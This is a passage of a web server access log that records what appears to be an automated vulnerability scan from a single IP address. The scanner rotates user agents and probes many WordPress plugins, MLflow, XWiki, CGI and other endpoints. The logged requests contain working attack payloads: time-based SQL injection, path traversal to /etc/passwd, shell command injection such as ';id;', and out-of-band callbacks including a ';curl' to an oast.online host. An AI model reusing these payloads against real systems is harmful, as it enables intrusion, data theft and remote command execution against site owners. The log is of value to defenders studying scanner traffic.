AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:56:04 -0400] "GET /wp-json/lp/v1/courses/archive-course?order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/112.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:56:36 -0400] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:56:48 -0400] "POST /api/2.0/mlflow/users/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:58:17 -0400] "GET /index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"} HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:58:24 -0400] "GET /wp-content/plugins/essential-blocks/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:58:29 -0400] "GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"2w9rfW9vynFAV4ZGFbYfh7u9QlT\" HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:58:40 -0400] "POST /php/ping.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:58:40 -0400] "POST /php/ping.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:59:07 -0400] "PUT /api/2.0/mlflow-artifacts/artifacts/2w9rfWwI05kqfqQpChkcb37Z9E7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:10:59:12 -0400] "DELETE 
/api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:10:59:53 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:00:09 -0400] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:11:00:13 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:00:16 -0400] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:11:00:21 -0400] "GET /wp-json/post-smtp/v1/get-log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 154.84.62.234 - - [24/Apr/2025:11:00:31 -0400] "GET /php/ztp_gate.php/.js.map HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:00:33 -0400] "GET /users/sign_in HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:11:00:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:01:14 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux 
x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 154.84.62.234 - - [24/Apr/2025:11:01:20 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:01:27 -0400] "GET /model-versions/get-artifact?name=2w9rfVXR1h8ncpqxS1HJaxg02tE&path=etc%2Fpasswd&version=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:01:42 -0400] "POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:01:56 -0400] "POST /classes/common/busiFacade.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.24" 154.84.62.234 - - [24/Apr/2025:11:02:14 -0400] "POST /api/file/formimage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:02:36 -0400] "POST /assets/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.18" 154.84.62.234 - - [24/Apr/2025:11:02:48 -0400] "GET /wp-content/plugins/user-meta/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:03:36 -0400] "POST /v6.58/Products/Authentication HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:03:58 -0400] "POST /Tool/uploadfile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:04:07 -0400] "GET /home/utbco.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:11:04:36 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:04:44 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:11:04:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:04:53 -0400] "GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - {{username}} [24/Apr/2025:11:05:17 -0400] "GET /api/v3/user/orgs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:05:27 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:05:29 -0400] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:06:22 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14" 154.84.62.234 - - [24/Apr/2025:11:06:55 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.8.25" 154.84.62.234 - - 
[24/Apr/2025:11:06:55 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ifconfig;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:06:56 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;id;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.4" 154.84.62.234 - - [24/Apr/2025:11:06:56 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;ifconfig;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:06:59 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:11:07:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:07:22 -0400] "POST /index.php/display/status_zigbee HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:11:07:27 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:07:58 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:08:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:09:10 -0400] "GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like 
Gecko) Version/17.4.1 Safari/605.5.18" 154.84.62.234 - - [24/Apr/2025:11:09:21 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:09:26 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.12 (KHTML, like Gecko) Version/17.3 Safari/617.12" 154.84.62.234 - - [24/Apr/2025:11:09:32 -0400] "GET /?__wpdmxp=%27][/wpdm_package][wpdm_all_packages][wpdm_package%20id=%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:09:32 -0400] "GET /file=http://oast.pro HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:10:56 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:11:35 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:12:08 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:12:08 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.18 (KHTML, like Gecko) Version/17.4 Safari/617.18" 154.84.62.234 - - [24/Apr/2025:11:12:26 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:12:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:12:35 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:11:12:38 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:19 -0400] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:29 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:41 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:13:42 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:52 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:14:10 -0400] "POST /component_server HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:11:14:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:14:27 -0400] "POST /wp-json/notificationx/v1/analytics HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - cslu-windows-client [24/Apr/2025:11:15:13 -0400] "GET /cslu/v1/scheduler/jobs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 154.84.62.234 - - [24/Apr/2025:11:15:34 -0400] "POST /queue/join HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:15:37 -0400] "GET /queue/data?session_hash=2w9rfQ7frfFFqUrrs6jWurLHObt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:11:15:38 -0400] "GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.7 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:09 -0400] "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:21 -0400] "GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:35 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:57 -0400] "POST /login?next=https://mgrokokbet.id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:17:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_7; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:17:54 -0400] "GET 
/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d04qr7ij4pq19d75k490sgnmr69tp6xqo.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:17:58 -0400] "POST /dana-ws/saml20.ws HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:18:05 -0400] "POST /dana-na/auth/saml-sso.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:18:06 -0400] "POST /task/submit/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:18:17 -0400] "POST /ajax/ticket_user_db.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:11:18:55 -0400] "GET /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.0) AppleWebKit/617.28 (KHTML, like Gecko) Version/17.0 Safari/617.28" 154.84.62.234 - - [24/Apr/2025:11:18:58 -0400] "POST /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 
154.84.62.234 - - [24/Apr/2025:11:19:05 -0400] "GET /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" 154.84.62.234 - - [24/Apr/2025:11:19:08 -0400] "POST /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:19:10 -0400] "POST /protocol/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:19:40 -0400] "GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,1499aadeaba2dd8efa4dbc04eb0cc04e,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:11:19:55 -0400] "POST /ajax/calendar.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:20:17 -0400] "POST /app/rest/users/id:1/tokens/2w9rff1ymIwq6Q8bLXsgoX1rDGQ;.jsp?jsp_precompile=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:21:35 -0400] 
"POST /_sql?types HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:21:41 -0400] "POST /_sql?types HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:21:42 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:21:48 -0400] "POST /_sql?types HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:22:32 -0400] "POST /clients/MyCRL HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:22:39 -0400] "GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.3.25" 154.84.62.234 - - [24/Apr/2025:11:22:40 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:22:50 -0400] "POST /gremlin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:22:57 -0400] "GET /importexport.php?sql=c2VsZWN0KzksbWQ1KDk4MzA1OTYpLDk=&type=exportexcelbysql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:23:10 -0400] "POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; 
